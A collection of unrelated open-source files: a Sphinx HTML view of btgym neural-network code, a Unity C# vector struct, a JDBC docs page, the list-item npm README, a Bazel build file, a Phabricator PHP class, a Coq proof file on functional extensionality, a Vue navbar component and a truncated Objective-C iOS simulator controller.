class="p">(</span><span class="n">log_sigma</span><span class="p">)</span> <span class="o">+</span> <span class="n">tf</span><span class="o">.</span><span class="n">square</span><span class="p">(</span><span class="n">mu</span><span class="p">)</span> <span class="o">-</span> <span class="mf">1.</span> <span class="o">-</span> <span class="n">log_sigma</span><span class="p">)</span> <span class="c1"># Reshape back and feed to decoder:</span> <span class="n">z_sampled_dec</span> <span class="o">=</span> <span class="n">tf</span><span class="o">.</span><span class="n">nn</span><span class="o">.</span><span class="n">elu</span><span class="p">(</span> <span class="n">linear</span><span class="p">(</span> <span class="n">x</span><span class="o">=</span><span class="n">z_sampled</span><span class="p">,</span> <span class="n">size</span><span class="o">=</span><span class="n">h</span> <span class="o">*</span> <span class="n">w</span> <span class="o">*</span> <span class="n">c</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;dec_dense&#39;</span><span class="p">,</span> <span class="n">initializer</span><span class="o">=</span><span class="n">normalized_columns_initializer</span><span class="p">(</span><span class="mf">1.0</span><span class="p">),</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span> <span class="p">)</span> <span class="p">)</span> <span class="n">decoder_layers</span> <span class="o">=</span> <span class="n">conv2d_decoder</span><span class="p">(</span> <span class="n">z</span><span class="o">=</span><span class="n">tf</span><span class="o">.</span><span class="n">reshape</span><span class="p">(</span><span class="n">z_sampled_dec</span><span class="p">,</span> <span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="n">h</span><span class="p">,</span> <span class="n">w</span><span class="p">,</span> <span class="n">c</span><span class="p">]),</span> <span class="n">layer_config</span><span class="o">=</span><span class="n">layer_config</span><span class="p">,</span> <span class="n">layer_shapes</span><span class="o">=</span><span class="n">shapes</span><span class="p">,</span> <span class="n">pad</span><span class="o">=</span><span class="n">pad</span><span class="p">,</span> <span class="n">resize_method</span><span class="o">=</span><span class="n">resize_method</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span> <span class="p">)</span> <span class="n">y_hat</span> <span class="o">=</span> <span class="n">decoder_layers</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="k">return</span> <span class="n">encoder_layers</span><span class="p">,</span> <span class="n">z_sampled</span><span class="p">,</span> <span class="n">decoder_layers</span><span class="p">,</span> <span class="n">y_hat</span><span class="p">,</span> <span class="n">d_kl</span></div> <div class="viewcode-block" id="KernelMonitor"><a class="viewcode-back" href="../../../../btgym.algorithms.nn.html#btgym.algorithms.nn.ae.KernelMonitor">[docs]</a><span class="k">class</span> <span class="nc">KernelMonitor</span><span class="p">():</span> <span class="sd">&quot;&quot;&quot;</span> <span class="sd"> Visualises convolution filters learnt for specific layer.</span> <span class="sd"> Source: https://blog.keras.io/how-convolutional-neural-networks-see-the-world.html</span> <span class="sd"> &quot;&quot;&quot;</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">conv_input</span><span class="p">,</span> <span class="n">layer_output</span><span class="p">):</span> <span class="sd">&quot;&quot;&quot;</span> <span class="sd"> Args:</span> <span class="sd"> conv_input: convolution stack input tensor</span> <span class="sd"> layer_output: tensor holding output of layer of interest from stack</span> <span class="sd"> &quot;&quot;&quot;</span> <span class="bp">self</span><span class="o">.</span><span class="n">idx</span> <span class="o">=</span> <span class="n">tf</span><span class="o">.</span><span class="n">placeholder</span><span class="p">(</span><span class="n">tf</span><span class="o">.</span><span class="n">int32</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;kernel_index&#39;</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">conv_input</span> <span class="o">=</span> <span class="n">conv_input</span> <span class="bp">self</span><span class="o">.</span><span class="n">layer_output</span> <span class="o">=</span> <span class="n">layer_output</span> <span class="c1"># Build a loss function that maximizes the activation</span> <span class="c1"># of the n-th filter of the layer considered:</span> <span class="bp">self</span><span class="o">.</span><span class="n">vis_loss</span> <span class="o">=</span> <span class="n">tf</span><span class="o">.</span><span class="n">reduce_mean</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">layer_output</span><span class="p">[:,</span> <span class="p">:,</span> <span class="p">:,</span> <span class="bp">self</span><span class="o">.</span><span class="n">idx</span><span class="p">])</span> <span class="c1"># Gradient of the input picture wrt this loss:</span> <span class="bp">self</span><span class="o">.</span><span class="n">vis_grads</span> <span class="o">=</span> <span class="n">tf</span><span class="o">.</span><span class="n">gradients</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">vis_loss</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">conv_input</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="c1"># Normalization trick:</span> <span class="bp">self</span><span class="o">.</span><span class="n">vis_grads</span> <span class="o">/=</span> <span class="p">(</span><span class="n">tf</span><span class="o">.</span><span class="n">sqrt</span><span class="p">(</span><span class="n">tf</span><span class="o">.</span><span class="n">reduce_mean</span><span class="p">(</span><span class="n">tf</span><span class="o">.</span><span class="n">square</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">vis_grads</span><span class="p">)))</span> <span class="o">+</span> <span class="mf">1e-5</span><span class="p">)</span> <span class="k">def</span> <span class="nf">_iterate</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">sess</span><span class="p">,</span> <span class="n">signal</span><span class="p">,</span> <span class="n">kernel_index</span><span class="p">):</span> <span class="sd">&quot;&quot;&quot;</span> <span class="sd"> Returns the loss and grads for specified kernel given the input signal</span> <span class="sd"> Args:</span> <span class="sd"> sess: tf.Session object</span> <span class="sd"> signal: input signal to convolution stack</span> <span class="sd"> kernel_index: filter number in layer considered</span> <span class="sd"> Returns:</span> <span class="sd"> loss and gradients values</span> <span class="sd"> &quot;&quot;&quot;</span> <span class="k">return</span> <span class="n">sess</span><span class="o">.</span><span class="n">run</span><span class="p">([</span><span class="bp">self</span><span class="o">.</span><span class="n">vis_loss</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">vis_grads</span><span class="p">],</span> <span class="p">{</span><span class="bp">self</span><span class="o">.</span><span class="n">conv_input</span><span class="p">:</span> <span class="n">signal</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">idx</span><span class="p">:</span> <span class="n">kernel_index</span><span class="p">})</span> <div class="viewcode-block" id="KernelMonitor.fit"><a class="viewcode-back" href="../../../../btgym.algorithms.nn.html#btgym.algorithms.nn.ae.KernelMonitor.fit">[docs]</a> <span class="k">def</span> <span class="nf">fit</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">sess</span><span class="p">,</span> <span class="n">kernel_index</span><span class="p">,</span> <span class="n">step</span><span class="o">=</span><span class="mf">1e-3</span><span class="p">,</span> <span class="n">num_steps</span><span class="o">=</span><span class="mi">40</span><span class="p">):</span> <span class="sd">&quot;&quot;&quot;</span> <span class="sd"> Learns input signal that maximizes the activation of given kernel.</span> <span class="sd"> Args:</span> <span class="sd"> sess: tf.Session object</span> <span class="sd"> kernel_index: filter number of interest</span> <span class="sd"> step: gradient ascent step size</span> <span class="sd"> num_steps: number of steps to fit</span> <span class="sd"> Returns:</span> <span class="sd"> learnt signal as np.array</span> <span class="sd"> &quot;&quot;&quot;</span> <span class="c1"># Start from some noise:</span> <span class="n">signal</span> <span class="o">=</span> <span class="n">np</span><span class="o">.</span><span class="n">random</span><span class="o">.</span><span class="n">random</span><span class="p">([</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="bp">self</span><span class="o">.</span><span class="n">conv_input</span><span class="o">.</span><span class="n">get_shape</span><span class="p">()</span><span class="o">.</span><span class="n">as_list</span><span class="p">()[</span><span class="mi">1</span><span class="p">:])</span> <span class="c1"># Run gradient ascent:</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">num_steps</span><span class="p">):</span> <span class="n">loss_value</span><span class="p">,</span> <span class="n">grads_value</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">_iterate</span><span class="p">(</span><span class="n">sess</span><span class="p">,</span> <span class="n">signal</span><span class="p">,</span> <span class="n">kernel_index</span><span class="p">)</span> <span class="n">signal</span> <span class="o">+=</span> <span class="n">grads_value</span> <span class="o">*</span> <span class="n">step</span> <span class="k">return</span> <span class="n">signal</span></div></div> </pre></div> </div> <div class="articleComments"> </div> </div> <footer> <hr/> <div role="contentinfo"> <p> &copy; Copyright 2017, 2018, Andrew Muzikin. </p> </div> Built with <a href="http://sphinx-doc.org/">Sphinx</a> using a <a href="https://github.com/snide/sphinx_rtd_theme">theme</a> provided by <a href="https://readthedocs.org">Read the Docs</a>. </footer> </div> </div> </section> </div> <script type="text/javascript"> var DOCUMENTATION_OPTIONS = { URL_ROOT:'../../../../', VERSION:'0.0.7', COLLAPSE_INDEX:false, FILE_SUFFIX:'.html', HAS_SOURCE: true, SOURCELINK_SUFFIX: '.txt' }; </script> <script type="text/javascript" src="../../../../_static/jquery.js"></script> <script type="text/javascript" src="../../../../_static/underscore.js"></script> <script type="text/javascript" src="../../../../_static/doctools.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script> <script type="text/javascript" src="../../../../_static/js/theme.js"></script> <script type="text/javascript"> jQuery(function () { SphinxRtdTheme.StickyNav.enable(); }); </script> </body> </html>
{ "pile_set_name": "Github" }
using System; using UnityEngine; namespace Parabox.Stl { struct StlVector3 : IEquatable<StlVector3> { const float k_Resolution = 10000f; public float x; public float y; public float z; public StlVector3(Vector3 v) { x = v.x; y = v.y; z = v.z; } public StlVector3(float x, float y, float z) { this.x = x; this.y = y; this.z = z; } public static explicit operator Vector3(StlVector3 vec) { return new Vector3(vec.x, vec.y, vec.z); } public static explicit operator StlVector3(Vector3 vec) { return new StlVector3(vec); } public bool Equals(StlVector3 other) { return Mathf.Approximately(x, other.x) && Mathf.Approximately(y, other.y) && Mathf.Approximately(z, other.z); } public override bool Equals(object obj) { if (obj == null || !(obj is StlVector3)) return false; return Equals((StlVector3) obj); } public override int GetHashCode() { // https://stackoverflow.com/questions/720177/default-implementation-for-object-gethashcode/720282#720282 unchecked { int hash = 27; hash = (13 * hash) + (x * k_Resolution).GetHashCode(); hash = (13 * hash) + (y * k_Resolution).GetHashCode(); hash = (13 * hash) + (z * k_Resolution).GetHashCode(); return hash; } } public static bool operator == (StlVector3 a, StlVector3 b) { return a.Equals(b); } public static bool operator != (StlVector3 a, StlVector3 b) { return ! a.Equals(b); } } }
{ "pile_set_name": "Github" }
--- description: "supportsGroupByUnrelated Method (SQLServerDatabaseMetaData)" title: "supportsGroupByUnrelated Method (SQLServerDatabaseMetaData) | Microsoft Docs" ms.custom: "" ms.date: "01/19/2017" ms.prod: sql ms.prod_service: connectivity ms.reviewer: "" ms.technology: connectivity ms.topic: conceptual apiname: - "SQLServerDatabaseMetaData.supportsGroupByUnrelated" apilocation: - "sqljdbc.jar" apitype: "Assembly" ms.assetid: 455fe02e-3877-409b-8281-8e0491acd3e8 author: David-Engel ms.author: v-daenge --- # supportsGroupByUnrelated Method (SQLServerDatabaseMetaData) [!INCLUDE[Driver_JDBC_Download](../../../includes/driver_jdbc_download.md)] Retrieves whether this database supports using a column that is not in the SELECT statement in a GROUP BY clause. ## Syntax ``` public boolean supportsGroupByUnrelated() ``` ## Return Value **true** if supported. Otherwise, **false**. ## Exceptions [SQLServerException](../../../connect/jdbc/reference/sqlserverexception-class.md) ## Remarks This supportsGroupByUnrelated method is specified by the supportsGroupByUnrelated method in the java.sql.DatabaseMetaData interface. ## See Also [SQLServerDatabaseMetaData Methods](../../../connect/jdbc/reference/sqlserverdatabasemetadata-methods.md) [SQLServerDatabaseMetaData Members](../../../connect/jdbc/reference/sqlserverdatabasemetadata-members.md) [SQLServerDatabaseMetaData Class](../../../connect/jdbc/reference/sqlserverdatabasemetadata-class.md)
{ "pile_set_name": "Github" }
# list-item [![NPM version](https://img.shields.io/npm/v/list-item.svg)](https://www.npmjs.com/package/list-item) [![Build Status](https://img.shields.io/travis/jonschlinkert/list-item.svg)](https://travis-ci.org/jonschlinkert/list-item) > Generate a single formatted list item, allowing you to easily generate lists with proper indentation, bullets, numbers or other leading characters. - [Install](#install) - [Usage](#usage) - [Examples](#examples) - [API](#api) - [Related projects](#related-projects) - [Running tests](#running-tests) - [Contributing](#contributing) - [Author](#author) - [License](#license) _(TOC generated by [verb](https://github.com/verbose/verb))_ ## Install Install with [npm](https://www.npmjs.com/) ```sh $ npm i list-item --save ``` ## Usage ```js var listitem = require('list-item'); ``` ## Examples **Basic list** Generate a list using default bullets and indentation: ```js var listitem = require('list-item'); var li = listitem(); var res = ''; ['a', 'b', 'c', 'd', 'e'].forEach(function (ele, i) { res += li(i, ele) + '\n'; }); ``` Results in: ``` - a * b + c - d * e ``` **Roman numerals** Generate roman numerals in increments of 10. ```js var listitem = require('list-item'); var romanize = require('romanize'); // specify `chars` to be passed to expand-range (lib), // and use the callback to modify generated numerals var li = listitem({chars: '1..100..10'}, function (ch) { return romanize(ch) + '.'; }); // generate a formatted list! ['a', 'b', 'c', 'd', 'e'].forEach(function (ele, i) { res += li(i, ele) + '\n'; }); ``` Results in: ``` I. a XI. b XXI. c XXXI. d XLI. e ``` ## API ### [listitem](index.js#L47) Returns a function to generate a plain-text/markdown list-item, allowing options to be cached for subsequent calls. **Params** * `options` **{Object}**: pass options to customize list item characters, indentation, etc. * `options.nobullet` **{Boolean}**: Pass true if you only want the list iten and identation, but no bullets. * `options.indent` **{String}**: The amount of leading indentation to use. default is ``. * `options.chars` **{String|Array}**: If a string is passed, [expand-range](https://github.com/jonschlinkert/expand-range) will be used to generate an array of bullets (visit [expand-range](https://github.com/jonschlinkert/expand-range) to see all options.) Or directly pass an array of bullets, numbers, letters or other characters to use for each list item. Default `['-', '*', '+']` * `fn` **{Function}**: pass a function [expand-range](https://github.com/jonschlinkert/expand-range) to modify the bullet for an item as it's generated. See the [examples](#examples). * `returns` **{String}**: returns a formatted list item **Example** ```js var li = listitem(options); li(0, 'Level 0 list item'); //=> '- Level 0 list item' li(1, 'Level 1 list item'); //=> ' * Level 1 list item' li(2, 'Level 2 list item'); //=> ' + Level 2 list item' ``` ## Related projects * [deromanize](https://www.npmjs.com/package/deromanize): Convert roman numerals to arabic numbers (useful for books, outlines, documentation, slide decks, etc) | [homepage](https://github.com/jonschlinkert/deromanize) * [expand-range](https://www.npmjs.com/package/expand-range): Fast, bash-like range expansion. Expand a range of numbers or letters, uppercase or lowercase. See… [more](https://www.npmjs.com/package/expand-range) | [homepage](https://github.com/jonschlinkert/expand-range) * [fill-range](https://www.npmjs.com/package/fill-range): Fill in a range of numbers or letters, optionally passing an increment or multiplier to… [more](https://www.npmjs.com/package/fill-range) | [homepage](https://github.com/jonschlinkert/fill-range) * [randomatic](https://www.npmjs.com/package/randomatic): Generate randomized strings of a specified length, fast. Only the length is necessary, but you… [more](https://www.npmjs.com/package/randomatic) | [homepage](https://github.com/jonschlinkert/randomatic) * [romanize](https://www.npmjs.com/package/romanize): Convert numbers to roman numerals (useful for books, outlines, documentation, slide decks, etc) | [homepage](https://github.com/jonschlinkert/romanize) * [to-regex-range](https://www.npmjs.com/package/to-regex-range): Returns a regex-compatible range from two numbers, min and max. Useful for creating regular expressions… [more](https://www.npmjs.com/package/to-regex-range) | [homepage](https://github.com/jonschlinkert/to-regex-range) ## Running tests Install dev dependencies: ```sh $ npm i -d && npm test ``` ## Contributing Pull requests and stars are always welcome. For bugs and feature requests, [please create an issue](https://github.com/jonschlinkert/list-item/issues/new). ## Author **Jon Schlinkert** * [github/jonschlinkert](https://github.com/jonschlinkert) * [twitter/jonschlinkert](http://twitter.com/jonschlinkert) ## License Copyright © 2015 [Jon Schlinkert](https://github.com/jonschlinkert) Released under the MIT license. *** _This file was generated by [verb](https://github.com/verbose/verb) on December 20, 2015._
{ "pile_set_name": "Github" }
package(default_visibility = ["//visibility:public"]) load( "@io_bazel_rules_go//go:def.bzl", "go_library", ) go_library( name = "go_default_library", srcs = [ "etcd.go", "strategy.go", ], importpath = "k8s.io/sample-apiserver/pkg/registry/wardle/fischer", deps = [ "//vendor/k8s.io/apimachinery/pkg/fields:go_default_library", "//vendor/k8s.io/apimachinery/pkg/labels:go_default_library", "//vendor/k8s.io/apimachinery/pkg/runtime:go_default_library", "//vendor/k8s.io/apimachinery/pkg/util/validation/field:go_default_library", "//vendor/k8s.io/apiserver/pkg/endpoints/request:go_default_library", "//vendor/k8s.io/apiserver/pkg/registry/generic:go_default_library", "//vendor/k8s.io/apiserver/pkg/registry/generic/registry:go_default_library", "//vendor/k8s.io/apiserver/pkg/storage:go_default_library", "//vendor/k8s.io/apiserver/pkg/storage/names:go_default_library", "//vendor/k8s.io/sample-apiserver/pkg/apis/wardle:go_default_library", "//vendor/k8s.io/sample-apiserver/pkg/registry:go_default_library", ], ) filegroup( name = "package-srcs", srcs = glob(["**"]), tags = ["automanaged"], visibility = ["//visibility:private"], ) filegroup( name = "all-srcs", srcs = [":package-srcs"], tags = ["automanaged"], )
{ "pile_set_name": "Github" }
<?php final class PhabricatorFulltextToken extends Phobject { private $token; private $isShort; private $isStopword; public function setToken(PhutilSearchQueryToken $token) { $this->token = $token; return $this; } public function getToken() { return $this->token; } public function isQueryable() { return !$this->getIsShort() && !$this->getIsStopword(); } public function setIsShort($is_short) { $this->isShort = $is_short; return $this; } public function getIsShort() { return $this->isShort; } public function setIsStopword($is_stopword) { $this->isStopword = $is_stopword; return $this; } public function getIsStopword() { return $this->isStopword; } public function newTag() { $token = $this->getToken(); $tip = null; $icon = null; $name = $token->getValue(); $function = $token->getFunction(); if ($function !== null) { $name = pht('%s: %s', $function, $name); } if ($this->getIsShort()) { $shade = PHUITagView::COLOR_GREY; $tip = pht('Ignored Short Word'); } else if ($this->getIsStopword()) { $shade = PHUITagView::COLOR_GREY; $tip = pht('Ignored Common Word'); } else { $operator = $token->getOperator(); switch ($operator) { case PhutilSearchQueryCompiler::OPERATOR_NOT: $shade = PHUITagView::COLOR_RED; $icon = 'fa-minus'; break; case PhutilSearchQueryCompiler::OPERATOR_SUBSTRING: $tip = pht('Substring Search'); $shade = PHUITagView::COLOR_VIOLET; break; case PhutilSearchQueryCompiler::OPERATOR_EXACT: $tip = pht('Exact Search'); $shade = PHUITagView::COLOR_GREEN; break; case PhutilSearchQueryCompiler::OPERATOR_PRESENT: $name = pht('Field Present: %s', $function); $shade = PHUITagView::COLOR_GREEN; break; case PhutilSearchQueryCompiler::OPERATOR_ABSENT: $name = pht('Field Absent: %s', $function); $shade = PHUITagView::COLOR_RED; break; default: $shade = PHUITagView::COLOR_BLUE; break; } } $tag = id(new PHUITagView()) ->setType(PHUITagView::TYPE_SHADE) ->setColor($shade) ->setName($name); if ($tip !== null) { Javelin::initBehavior('phabricator-tooltips'); $tag ->addSigil('has-tooltip') ->setMetadata( array( 'tip' => $tip, )); } if ($icon !== null) { $tag->setIcon($icon); } return $tag; } }
{ "pile_set_name": "Github" }
(************************************************************************) (* * The Coq Proof Assistant / The Coq Development Team *) (* v * INRIA, CNRS and contributors - Copyright 1999-2018 *) (* <O___,, * (see CREDITS file for the list of authors) *) (* \VV/ **************************************************************) (* // * This file is distributed under the terms of the *) (* * GNU Lesser General Public License Version 2.1 *) (* * (see LICENSE file for the text of the license) *) (************************************************************************) (** Some facts and definitions about extensionality We investigate the relations between the following extensionality principles - Functional extensionality - Equality of projections from diagonal - Unicity of inverse bijections - Bijectivity of bijective composition Table of contents 1. Definitions 2. Functional extensionality <-> Equality of projections from diagonal 3. Functional extensionality <-> Unicity of inverse bijections 4. Functional extensionality <-> Bijectivity of bijective composition *) Set Implicit Arguments. (**********************************************************************) (** * Definitions *) (** Being an inverse *) Definition is_inverse A B f g := (forall a:A, g (f a) = a) /\ (forall b:B, f (g b) = b). (** The diagonal over A and the one-one correspondence with A *) Record Delta A := { pi1:A; pi2:A; eq:pi1=pi2 }. Definition delta {A} (a:A) := {|pi1 := a; pi2 := a; eq := eq_refl a |}. Arguments pi1 {A} _. Arguments pi2 {A} _. Lemma diagonal_projs_same_behavior : forall A (x:Delta A), pi1 x = pi2 x. Proof. destruct x as (a1,a2,Heq); assumption. Qed. Lemma diagonal_inverse1 : forall A, is_inverse (A:=A) delta pi1. Proof. split; [trivial|]; destruct b as (a1,a2,[]); reflexivity. Qed. Lemma diagonal_inverse2 : forall A, is_inverse (A:=A) delta pi2. Proof. split; [trivial|]; destruct b as (a1,a2,[]); reflexivity. Qed. (** Functional extensionality *) Local Notation FunctionalExtensionality := (forall A B (f g : A -> B), (forall x, f x = g x) -> f = g). (** Equality of projections from diagonal *) Local Notation EqDeltaProjs := (forall A, pi1 = pi2 :> (Delta A -> A)). (** Unicity of bijection inverse *) Local Notation UniqueInverse := (forall A B (f:A->B) g1 g2, is_inverse f g1 -> is_inverse f g2 -> g1 = g2). (** Bijectivity of bijective composition *) Definition action A B C (f:A->B) := (fun h:B->C => fun x => h (f x)). Local Notation BijectivityBijectiveComp := (forall A B C (f:A->B) g, is_inverse f g -> is_inverse (A:=B->C) (action f) (action g)). (**********************************************************************) (** * Functional extensionality <-> Equality of projections from diagonal *) Theorem FunctExt_iff_EqDeltaProjs : FunctionalExtensionality <-> EqDeltaProjs. Proof. split. - intros FunExt *; apply FunExt, diagonal_projs_same_behavior. - intros EqProjs **; change f with (fun x => pi1 {|pi1:=f x; pi2:=g x; eq:=H x|}). rewrite EqProjs; reflexivity. Qed. (**********************************************************************) (** * Functional extensionality <-> Unicity of bijection inverse *) Lemma FunctExt_UniqInverse : FunctionalExtensionality -> UniqueInverse. Proof. intros FunExt * (Hg1f,Hfg1) (Hg2f,Hfg2). apply FunExt. intros; congruence. Qed. Lemma UniqInverse_EqDeltaProjs : UniqueInverse -> EqDeltaProjs. Proof. intros UniqInv *. apply UniqInv with delta; [apply diagonal_inverse1 | apply diagonal_inverse2]. Qed. Theorem FunctExt_iff_UniqInverse : FunctionalExtensionality <-> UniqueInverse. Proof. split. - apply FunctExt_UniqInverse. - intro; apply FunctExt_iff_EqDeltaProjs, UniqInverse_EqDeltaProjs; trivial. Qed. (**********************************************************************) (** * Functional extensionality <-> Bijectivity of bijective composition *) Lemma FunctExt_BijComp : FunctionalExtensionality -> BijectivityBijectiveComp. Proof. intros FunExt * (Hgf,Hfg). split; unfold action. - intros h; apply FunExt; intro b; rewrite Hfg; reflexivity. - intros h; apply FunExt; intro a; rewrite Hgf; reflexivity. Qed. Lemma BijComp_FunctExt : BijectivityBijectiveComp -> FunctionalExtensionality. Proof. intros BijComp. apply FunctExt_iff_UniqInverse. intros * H1 H2. destruct BijComp with (C:=A) (1:=H2) as (Hg2f,_). destruct BijComp with (C:=A) (1:=H1) as (_,Hfg1). rewrite <- (Hg2f g1). change g1 with (action g1 (fun x => x)). rewrite -> (Hfg1 (fun x => x)). reflexivity. Qed.
{ "pile_set_name": "Github" }
<template> <header class="navbar"> <SidebarButton @toggle-sidebar="$emit('toggle-sidebar')"/> <router-link :to="$localePath" class="home-link" > <img class="logo" v-if="$site.themeConfig.logo" :src="$withBase($site.themeConfig.logo)" :alt="$siteTitle" > </router-link> <div class="links" :style="linksWrapMaxWidth ? { 'max-width': linksWrapMaxWidth + 'px' } : {}" > <AlgoliaSearchBox v-if="isAlgoliaSearch" :options="algolia" /> <SearchBox v-else-if="$site.themeConfig.search !== false && $page.frontmatter.search !== false"/> <NavLinks class="can-hide"/> </div> </header> </template> <script> import AlgoliaSearchBox from '@AlgoliaSearchBox' import SearchBox from '@SearchBox' import SidebarButton from '@theme/components/SidebarButton.vue' import NavLinks from '@theme/components/NavLinks.vue' export default { components: {SidebarButton, NavLinks, SearchBox, AlgoliaSearchBox}, data() { return { linksWrapMaxWidth: null } }, mounted() { const MOBILE_DESKTOP_BREAKPOINT = 719 // refer to config.styl const NAVBAR_VERTICAL_PADDING = parseInt(css(this.$el, 'paddingLeft')) + parseInt(css(this.$el, 'paddingRight')) const handleLinksWrapWidth = () => { if (document.documentElement.clientWidth < MOBILE_DESKTOP_BREAKPOINT) { this.linksWrapMaxWidth = null } else { this.linksWrapMaxWidth = this.$el.offsetWidth - NAVBAR_VERTICAL_PADDING - (this.$refs.siteName && this.$refs.siteName.offsetWidth || 0) } } handleLinksWrapWidth() window.addEventListener('resize', handleLinksWrapWidth, false) }, computed: { algolia() { return this.$themeLocaleConfig.algolia || this.$site.themeConfig.algolia || {} }, isAlgoliaSearch() { return this.algolia && this.algolia.apiKey && this.algolia.indexName } } } function css(el, property) { // NOTE: Known bug, will return 'auto' if style value is 'auto' const win = el.ownerDocument.defaultView // null means not to return pseudo styles return win.getComputedStyle(el, null)[property] } </script> <style lang="stylus"> $navbar-vertical-padding = 0.7rem $navbar-horizontal-padding = 1.5rem .navbar padding $navbar-vertical-padding $navbar-horizontal-padding line-height $navbarHeight - 1.4rem a, span, img display inline-block .logo height $navbarHeight - 1.4rem min-width $navbarHeight - 1.4rem margin-right 0.8rem vertical-align top .site-name font-size 1.3rem font-weight 600 color $textColor position relative .links padding-left 1.5rem box-sizing border-box background-color white white-space nowrap font-size 0.9rem position absolute right $navbar-horizontal-padding top $navbar-vertical-padding display flex .search-box flex: 0 0 auto vertical-align top @media (max-width: $MQMobile) .navbar padding-left 4rem .can-hide display none .links padding-left 1.5rem .site-name width calc(100vw - 9.4rem) overflow hidden white-space nowrap text-overflow ellipsis .notice-bd display:none!important </style>
{ "pile_set_name": "Github" }
// // ZappSimulatorController.m // Zapp // // Created by Jim Puls on 8/16/11. // Licensed to Square, Inc. under one or more contributor license agreements. // See the LICENSE file distributed with this work for the terms under // which Square, Inc. licenses this file to you. #import "ZappSimulatorController.h" #import "ZappVideoController.h" #include <sys/stat.h> @interface ZappSimulatorController () @property (copy) ZappResultBlock completionBlock; @property (strong) NSFileHandle *fileHandle; @property (strong) DTiPhoneSimulatorSession *session; @property (copy) ZappIntermediateOutputBlock outputBlock; @property NSInteger consecutiveBlankReads; @property BOOL hasSuccessfulRead; @property (strong) ZappVideoController *videoController; @property (weak) NSOperationQueue *callingQueue; - (void)readNewOutput; - (void)clearSession; @end @implementation ZappSimulatorController @synthesize appURL; @synthesize arguments; @synthesize callingQueue; @synthesize completionBlock; @synthesize consecutiveBlankReads; @synthesize environment; @synthesize fileHandle; @synthesize hasSuccessfulRead; @synthesize platform; @synthesize sdk; @synthesize session; @synthesize simulatorOutputPath; @synthesize outputBlock; @synthesize videoController; @synthesize videoOutputURL; - (BOOL)launchSessionWithOutputBlock:(ZappIntermediateOutputBlock)theOutputBlock completionBlock:(ZappResultBlock)theCompletionBlock; { NSAssert(![NSThread isMainThread], @"%s called from main thread", _cmd); NSString *path = self.appURL.path; DTiPhoneSimulatorApplicationSpecifier *specifier = [DTiPhoneSimulatorApplicationSpecifier specifierWithApplicationPath:path]; if (!specifier) { NSLog(@"Could not load application specifier for '%@'", path); return NO; } self.outputBlock = theOutputBlock; self.completionBlock = theCompletionBlock; self.callingQueue = [NSOperationQueue currentQueue]; self.hasSuccessfulRead = NO; self.consecutiveBlankReads = 0; DTiPhoneSimulatorSystemRoot *simulator = [DTiPhoneSimulatorSystemRoot rootWithSDKVersion:self.sdk]; DTiPhoneSimulatorSessionConfig *config = [DTiPhoneSimulatorSessionConfig new]; config.applicationToSimulateOnStart = specifier; config.simulatedSystemRoot = simulator; config.simulatedDeviceFamily = [NSNumber numberWithInteger:self.platform]; config.simulatedApplicationShouldWaitForDebugger = NO; config.simulatedApplicationLaunchArgs = self.arguments; config.simulatedApplicationLaunchEnvironment = self.environment; config.localizedClientName = [[NSRunningApplication currentApplication] localizedName]; config.simulatedApplicationStdOutPath = self.simulatorOutputPath; config.simulatedApplicationStdErrPath = self.simulatorOutputPath; self.session = [DTiPhoneSimulatorSession new]; session.delegate = self; self.fileHandle = [NSFileHandle fileHandleForReadingAtPath:self.simulatorOutputPath]; [fileHandle seekToEndOfFile]; NSFileManager *fileManager = [NSFileManager defaultManager]; NSError *error = nil; NSString *pathComponent = [NSString stringWithFormat:@"iPhone Simulator/%@/Applications", [self.sdk isEqualToString:@"5.0"] ? @"5.0" : @"4.3.2"]; NSURL *simulatorAppsURL = [[fileManager URLForDirectory:NSApplicationSupportDirectory inDomain:NSUserDomainMask appropriateForURL:nil create:NO error:&error] URLByAppendingPathComponent:pathComponent]; NSAssert(!error, @"Got an error finding the simulator applications folder"); if ([fileManager fileExistsAtPath:simulatorAppsURL.path]) { [fileManager removeItemAtURL:simulatorAppsURL error:&error]; NSAssert(!error, @"Got an error deleting the simulator applications folder"); } NSURL *simulatorURL = [NSURL fileURLWithPath:simulator.sdkRootPath]; simulatorURL = [[simulatorURL URLByDeletingLastPathComponent] URLByDeletingLastPathComponent]; simulatorURL = [[simulatorURL URLByAppendingPathComponent:@"Applications"] URLByAppendingPathComponent:@"iPhone Simulator.app"]; [[NSOperationQueue mainQueue] addOperationWithBlock:^() { NSError *error = nil; [[NSWorkspace sharedWorkspace] launchApplicationAtURL:simulatorURL options:NSWorkspaceLaunchDefault configuration:nil error:&error]; if (![session requestStartWithConfig:config timeout:30.0 error:&error]) { NSLog(@"Could not start simulator session: %@", error); return; } NSArray *runningApplications = [NSRunningApplication runningApplicationsWithBundleIdentifier:@"com.apple.iphonesimulator"]; NSRunningApplication *simulator = [runningApplications lastObject]; [simulator activateWithOptions:(NSApplicationActivateAllWindows | NSApplicationActivateIgnoringOtherApps)]; [self readNewOutput]; }]; return YES; } #pragma mark DTiPhoneSimulatorSessionDelegate - (void)session:(DTiPhoneSimulatorSession 